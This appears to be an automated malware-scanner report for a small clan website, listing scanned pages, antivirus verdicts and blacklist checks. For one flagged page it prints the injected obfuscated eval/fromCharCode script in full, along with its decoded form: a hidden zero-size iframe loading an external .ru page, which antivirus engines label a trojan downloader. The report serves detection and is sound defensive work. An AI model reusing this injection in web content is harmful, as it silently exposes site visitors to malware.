Malware Scanner report for headshot-cs.clan.su

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Scanned pages/files

Request / Server response / Status
http://headshot-cs.clan.su/index/0-11
200 OK
Content-Length: 118891
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C115%2C56%2C46%2C115%2C116%2C101%2C97%2C100%2C121%2C104%2C111%2C115%2C116%2C46%2C114%2C117%2C58%2C56%2C49%2C47%2C126%2C101%2C108%2C118%2C105%2C122%2C105%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

Decoded script:


document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));
<iframe src="http://www.s8.steadyhost.ru:81/~elvizi/ice/index.php" width="0" height="0"></iframe>

Antivirus reports:

AntiVir: HEUR/HTML.Malware
Avast: JS:ScriptDC-inf [Trj]
K7AntiVirus: Trojan ( 33ac8bb90 )
TrendMicro-HouseCall: TROJ_GEN.F47V1203
DrWeb: SCRIPT.Virus
NANO-Antivirus: Trojan.Script.IFrame.iicu
F-Prot: JS/IFrame
Norman: Iframe.H
Sophos: Mal/Iframe-F
Commtouch: JS/IFrame
ESET-NOD32: JS/TrojanDownloader.Iframe.NKF

http://s7.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s7.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s7.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean
http://www.ruscounter.com/count.php?site=7452
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://www.ruscounter.com/test404page.js
404 Not Found
Content-Length: 9626
Content-Type: text/html
clean
http://1directory.ru/cnt.php?id=82
200 OK
Content-Length: 20
Content-Type: text/html
clean
http://1directory.ru/test404page.js
404 Not Found
Content-Length: 9822
Content-Type: text/html
clean
http://1directory.ru/
200 OK
Content-Length: 9822
Content-Type: text/html
clean
http://1directory.ru/register.php
200 OK
Content-Length: 9571
Content-Type: text/html
clean
http://1directory.ru/top.php?view=best
200 OK
Content-Length: 56642
Content-Type: text/html
clean
http://1directory.ru/top.php?view=new
200 OK
Content-Length: 59678
Content-Type: text/html
clean
http://1directory.ru/statistic.php
200 OK
Content-Length: 9206
Content-Type: text/html
clean
http://1directory.ru/contacts.php
200 OK
Content-Length: 3602
Content-Type: text/html
clean
http://1directory.ru/categories.php?cat=Avto_i_moto
200 OK
Content-Length: 32195
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: headshot-cs.clan.su

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Referer: http://www.google.com/search?q=headshot-cs.clan.su

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=headshot-cs.clan.su

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://headshot-cs.clan.su/

Result: headshot-cs.clan.su is not infected or malware details are not published yet.